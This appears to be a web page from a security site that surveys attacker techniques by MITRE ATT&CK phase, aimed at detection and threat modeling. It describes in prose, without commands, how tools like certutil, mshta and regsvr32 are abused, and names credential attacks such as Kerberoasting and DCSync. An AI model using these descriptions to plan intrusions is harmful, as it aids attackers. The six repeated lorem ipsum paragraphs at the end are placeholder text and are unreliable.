Contact Us

Browse cybersecurity research, threat data, attack techniques, statistics, and compliance guides on CyberSanso. Free to use, updated regularly.

Attack Techniques Library: Adversary Tactics, Techniques, and Procedures Documented

Defenders who understand how attacks actually work build better detection and response capabilities than those who focus only on defensive controls. CyberSanso’s Attack Techniques Library documents offensive techniques used by real threat actors – mapped to the MITRE ATT&CK framework, organized by attack phase, and annotated with detection opportunities, affected platforms, and real-world procedure examples from documented incident investigations.

This library supports threat modeling, purple team exercise design, red team operation planning, detection engineering, and security awareness training. Every technique entry links to associated threat actor profiles, relevant CVEs where technique exploitation is vulnerability-specific, and defensive controls from NIST CSF, CIS Controls, and MITRE D3FEND that address the technique.

The content here is deliberately adversary-focused rather than tool-focused. The goal is not a software product comparison but a technical understanding of how modern attackers move through environments – from initial access through data exfiltration – so defenders can build detection and response capabilities that address the techniques, not just the specific tools currently used to execute them. Tools change. Fundamental techniques persist.

Attack Phases: From Initial Access to Impact

Modern attacks rarely succeed in a single step. The cyber kill chain and MITRE ATT&CK matrix both describe attacks as multi-phase operations where each phase accomplishes a specific adversary goal. Understanding the full attack sequence helps defenders prioritize detection investment at the phases where early-stage detection provides the most disruption value.

Initial Access (TA0001): The techniques adversaries use to gain a foothold in your environment. The most common initial access techniques in 2025-2026 per the Verizon DBIR are: phishing (T1566) – crafting deceptive emails to steal credentials or deliver malware; exploiting public-facing applications (T1190) – targeting known CVEs in internet-exposed services like VPN appliances and edge devices; and valid accounts (T1078) – using stolen credentials from prior breaches, credential stuffing, or brute force. Vulnerability exploitation surpassed credential theft as the top initial access vector in the 2026 DBIR for the first time, now representing 31% of all breach entry points.

Execution (TA0002): How adversaries run their code after gaining access. Living-off-the-land binaries (LOLBins) and scripts are the dominant execution technique class in 2026: using legitimate system utilities like PowerShell, WMI, cmd.exe, certutil, and mshta to execute malicious payloads without dropping files that trigger traditional antivirus detection. The LOLBAS project catalogs these binaries. Malware-free intrusions accounted for 79% of CrowdStrike detections in 2024.

Persistence (TA0003): How adversaries maintain access across reboots and account changes. Common persistence techniques include scheduled tasks (T1053), registry run keys (T1547.001), web shells on internet-facing servers (T1505.003), and account manipulation (T1098). Nation-state actors often implant multiple persistence mechanisms to ensure continued access even if primary entry points are discovered and remediated.

Lateral Movement (TA0008): How adversaries move from their initial foothold to other systems. Pass-the-hash (T1550.002) and Pass-the-ticket (T1550.003) attacks use captured authentication material to move laterally without knowing plaintext passwords. Remote services exploitation (T1021) using RDP, WMI, or SMB is common in both criminal ransomware operations and nation-state espionage campaigns.

Privilege Escalation and Defense Evasion: The Hidden Middle Phases

Between gaining initial access and achieving their ultimate objective, adversaries focus on two capabilities that security teams often under-detect: escalating their privileges to gain administrative control, and evading the defenses they encounter along the way.

Privilege Escalation (TA0004) converts a foothold in a low-privilege user account into administrative or SYSTEM-level control. Common techniques include exploiting known local privilege escalation vulnerabilities (T1068) in the OS or installed software, abusing Windows token privileges (T1134), DLL hijacking (T1574.002), and process injection into higher-privileged processes (T1055). Active Directory-specific privilege escalation techniques – Kerberoasting (T1558.003), AS-REP roasting (T1558.004), and DCSync attacks (T1003.006) – are heavily used in ransomware operations and espionage campaigns alike because they target the authentication infrastructure that grants domain-wide access.

Defense Evasion (TA0005) is the most populated ATT&CK tactic with over 40 techniques. Key techniques include: indicator removal (T1070) – deleting logs and artifacts; masquerading (T1036) – naming malware to look like legitimate system processes; obfuscated files or information (T1027) – encoding or encrypting payloads to bypass static analysis; and disabling security tools (T1562) – terminating endpoint protection processes using legitimate admin tools. Detection of defense evasion activity often provides higher-confidence breach confirmation than initial access detection because evasion behaviors are abnormal even in environments with sophisticated adversaries.

Living Off the Land: Why Modern Attacks Are Hard to Detect

The dominant trend in attacker tradecraft since 2022 has been the shift toward “living off the land” (LotL) techniques: using legitimate operating system tools, scripting environments, and management frameworks to execute attack phases without introducing custom malware that endpoint security tools are designed to detect.

LOLBins (Living Off the Land Binaries) are legitimate Windows system binaries that can be abused for malicious purposes: certutil.exe for downloading payloads and decoding base64-encoded content; mshta.exe for executing HTA files hosting malicious scripts; regsvr32.exe for executing COM scriptlets from remote URLs; wmic.exe and powershell.exe for remote execution and reconnaissance. The LOLBAS project (lolbas-project.github.io) catalogs 200+ such binaries with documented abuse techniques. LOLBins are particularly challenging to detect because they are expected to run in any Windows environment – distinguishing legitimate administrative use from attacker abuse requires behavioral context rather than simple file-based blocklisting.

Fileless attacks represent the endpoint of this trend: attacks that never write a file to disk, operating entirely within process memory and legitimate system processes. CrowdStrike’s 2024 Global Threat Report found that malware-free intrusion techniques accounted for 79% of all detected attacks. Detecting fileless attacks requires behavioral analysis in the kernel and memory, capabilities available in modern EDR platforms but not in traditional antivirus solutions.

Detection strategies for LotL techniques rely on behavioral baselines: what is the normal pattern of PowerShell execution in your environment? What systems legitimately use certutil.exe? Anomalous execution chains – PowerShell spawning from Word, certutil downloading from external IPs, wmic executing on endpoints it does not normally manage – provide high-confidence behavioral indicators of attacker presence even without traditional IOC matches.

Threat Modeling with ATT&CK: From Adversary Profile to Defensive Priority

Threat modeling maps your organization’s specific threat actor exposure to the ATT&CK techniques those actors use, allowing you to prioritize detection engineering toward the techniques most likely to appear in an attack against you.

The process has four steps:

Step 1 – Identify relevant threat actors: Which threat actor groups target your industry, your geography, and your organization’s type and size? CyberSanso’s Threat Actor Profiles page documents TTPs for nation-state groups, ransomware operations, and hacktivist collectives. For sector-specific guidance, the relevant ISAC (Information Sharing and Analysis Center) publishes threat actor briefings for its members.

Step 2 – Map actor TTPs to ATT&CK: For each relevant threat actor, identify which ATT&CK techniques they are documented to use. MITRE’s ATT&CK Groups database links each named group to their known techniques with procedure examples and source citations from public threat reports.

Step 3 – Assess your detection coverage: For each technique used by your relevant threat actors, evaluate whether your current security stack generates alerting or logging data that would detect that technique. The MITRE ATT&CK Navigator (attack.mitre.org/resources/navigator) is the standard tool for visualizing this coverage. Green cells are covered; white cells are detection gaps.

Step 4 – Prioritize detection engineering: Address detection gaps in the techniques used most frequently by your highest-priority threat actors. Detection rules, SIEM content, and EDR policies should be built to address the techniques your specific adversaries use rather than a generic threat landscape.

Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.

Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.

Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.

Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.

Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.

Suspendisse ut ultricies augue. Sed at leo vitae tempus. Quisque a vel nulla vestibulum eleifend at id augue. Nullam volutpat justo eget justo finibus mattis. Nam, massa sit amet euismod fermentum.